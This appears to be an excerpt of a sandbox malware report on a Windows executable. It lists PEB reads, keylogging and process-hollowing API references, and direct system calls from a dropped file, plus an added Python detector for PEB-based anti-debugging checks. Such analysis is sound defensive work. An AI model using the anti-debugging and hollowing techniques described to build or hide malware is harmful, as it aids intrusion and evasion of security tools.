            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01134588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011065D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011025E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_010FC427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01186420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0112245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011BA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_010F645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118C460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011BA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011344B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118A4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011064AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011004E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01100710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01130710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0117C730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01100750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01142750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118E75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01184755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01108770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01110770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011A678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011B47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011007AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0110C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011807C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011047FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118E7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011227ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01142619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0111260B mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0117E609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01136620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01138620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0111E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0110262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0111C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01132674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011C866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01104690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011366B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118C912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0119892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011D4940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01180946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118C97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01126962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0114096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0114096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0114096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011889B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011009AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011349D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011CA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011969C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118E9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118C810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011A483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01122835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01122835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01130854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01104859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01112840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01196870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118C89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01100887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0112E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011D08C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011CA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011D4B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0112EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011C8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011AEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011D2B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011B4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011A8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011CAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_010F8B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_010FCB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011AEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118CBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0112EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0118CA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0112EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011AEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01138A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_011D4A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Code function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe, Memory allocated: page read and write | page guard
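            Every `mov r32, dword ptr fs:[00000030h]` hit listed above is a fetch of the PEB pointer: on 32-bit Windows the fs segment base is the TEB, and TEB+0x30 is its ProcessEnvironmentBlock field. What the code does with the pointer afterwards decides whether the read is anti-debugging (PEB+0x02 BeingDebugged, PEB+0x68 NtGlobalFlag), module-list walking for API resolution (PEB+0x0C Ldr), or hollowing support (PEB+0x08 ImageBaseAddress, which is exactly what the `ReadProcessMemory(..., num3 + 8, ref buffer, 4, ...)` reference further down this page retrieves from the target process). Runtime and packer code reads the PEB for legitimate reasons too, so the density of hits is supporting context for the other signatures rather than a verdict on its own. The following Python is an added example, not part of the Joe Sandbox report: it matches the instruction encodings behind these hits in raw code bytes and decodes the PEB fields those reads lead to. The sample code bytes and the PEB image are constructed here; the Ldr and image-base values in them are made up.

```python
import re
import struct
from typing import Dict, List, Tuple

# Added example, not part of the Joe Sandbox report. Encodings of
# "mov <reg>, dword ptr fs:[30h]" on 32-bit Windows:
#   64 A1 30 00 00 00      mov eax, fs:[30h]  (short moffs32 form)
#   64 8B /r 30 00 00 00   mov r32, fs:[30h]  (ModRM disp32 form, /r = register)
FS_PEB_READS: List[Tuple[str, bytes]] = [
    ("eax", b"\x64\xa1\x30\x00\x00\x00"),
    ("eax", b"\x64\x8b\x05\x30\x00\x00\x00"),
    ("ecx", b"\x64\x8b\x0d\x30\x00\x00\x00"),
    ("edx", b"\x64\x8b\x15\x30\x00\x00\x00"),
    ("ebx", b"\x64\x8b\x1d\x30\x00\x00\x00"),
    ("esi", b"\x64\x8b\x35\x30\x00\x00\x00"),
    ("edi", b"\x64\x8b\x3d\x30\x00\x00\x00"),
]

# 32-bit PEB fields that anti-debug and hollowing code reads. Offsets are the
# long-stable ones (BeingDebugged 0x02, ImageBaseAddress 0x08, Ldr 0x0C,
# NtGlobalFlag 0x68); the three FLG_HEAP_* bits in NtGlobalFlag are set when
# the process was created under a debugger.
PEB32_HEADER = "<BBBBIIII"  # InheritedAddressSpace, ReadImageFileExecOptions,
                            # BeingDebugged, BitField, Mutant, ImageBaseAddress,
                            # Ldr, ProcessParameters
PEB32_NTGLOBALFLAG = 0x68
FLG_HEAP_DEBUG_BITS = 0x70  # TAIL_CHECK | FREE_CHECK | VALIDATE_PARAMETERS


def scan_for_peb_reads(code: bytes) -> List[Tuple[int, str]]:
    """(offset, register) for every fs:[30h] read found in raw code bytes.

    Pure byte matching also fires on data that happens to contain the pattern,
    so run it over executable sections or disassembler output, not whole files.
    """
    hits = []
    for reg, pattern in FS_PEB_READS:
        for m in re.finditer(re.escape(pattern), code):
            hits.append((m.start(), reg))
    return sorted(hits)


def parse_peb32(peb: bytes) -> Dict[str, int]:
    """Decode the PEB fields above from a raw 32-bit PEB image."""
    _, _, being_debugged, _, mutant, image_base, ldr, params = struct.unpack_from(PEB32_HEADER, peb, 0)
    (nt_global_flag,) = struct.unpack_from("<I", peb, PEB32_NTGLOBALFLAG)
    return {
        "BeingDebugged": being_debugged,
        "Mutant": mutant,
        "ImageBaseAddress": image_base,  # what ReadProcessMemory(peb + 8, 4 bytes) fetches
        "Ldr": ldr,
        "ProcessParameters": params,
        "NtGlobalFlag": nt_global_flag,
    }


def debugger_indicators(fields: Dict[str, int]) -> List[str]:
    """Which of the classic PEB-based debugger checks would fire on these fields."""
    found = []
    if fields["BeingDebugged"]:
        found.append("PEB.BeingDebugged")
    if (fields["NtGlobalFlag"] & FLG_HEAP_DEBUG_BITS) == FLG_HEAP_DEBUG_BITS:
        found.append("PEB.NtGlobalFlag heap debug bits")
    return found


# Constructed sample: a 32-bit function that fetches the PEB into eax to reach
# Ldr (+0x0C) and into ecx to test BeingDebugged (+0x02).
SAMPLE_CODE = (
    b"\x55\x8b\xec"                      # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[30h]          (offset 3)
    b"\x8b\x40\x0c"                      # mov eax, [eax+0Ch]         PEB.Ldr
    b"\x64\x8b\x0d\x30\x00\x00\x00"      # mov ecx, fs:[30h]          (offset 12)
    b"\x0f\xb6\x41\x02"                  # movzx eax, byte ptr [ecx+2] PEB.BeingDebugged
    b"\x5d\xc3"                          # pop ebp; ret
)

# Constructed 32-bit PEB image of a debugged process; the addresses are made up.
SAMPLE_PEB = bytearray(0x70)
SAMPLE_PEB[0x02] = 1
struct.pack_into("<I", SAMPLE_PEB, 0x08, 0x00400000)  # ImageBaseAddress
struct.pack_into("<I", SAMPLE_PEB, 0x0C, 0x77A10000)  # Ldr (hypothetical)
struct.pack_into("<I", SAMPLE_PEB, 0x68, FLG_HEAP_DEBUG_BITS)

if __name__ == "__main__":
    for offset, reg in scan_for_peb_reads(SAMPLE_CODE):
        print(f"+0x{offset:04x}: mov {reg}, dword ptr fs:[00000030h]")
    fields = parse_peb32(SAMPLE_PEB)
    print(f"ImageBaseAddress=0x{fields['ImageBaseAddress']:08x}", debugger_indicators(fields))
```

            To reproduce the report's list from a dumped image, run `scan_for_peb_reads` over the unpacked `.text` section and map each offset back to its function start; the register that receives the PEB and the instruction that follows it tell you which PEB field the code is after.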

            HIPS / PFW / Operating System Protection Evasion

            Source: yZcecBUXN7.exe, WO-.cs, Reference to suspicious API methods: _003B_2964_05B4.MapVirtualKey(_05B5.union.keyboardInput.wVk, 0)
            Source: yZcecBUXN7.exe, ---.cs, Reference to suspicious API methods: _003B_2964_05B4.GetAsyncKeyState(16)
            Source: yZcecBUXN7.exe, ---.cs, Reference to suspicious API methods: _003B_2964_05B4.OpenProcess(_FFFDi, _0739_0300, K_07FB_06E8)
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs, Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)) (2 occurrences)
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs, Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQuerySystemInformation: Direct from: 0x76F048CC
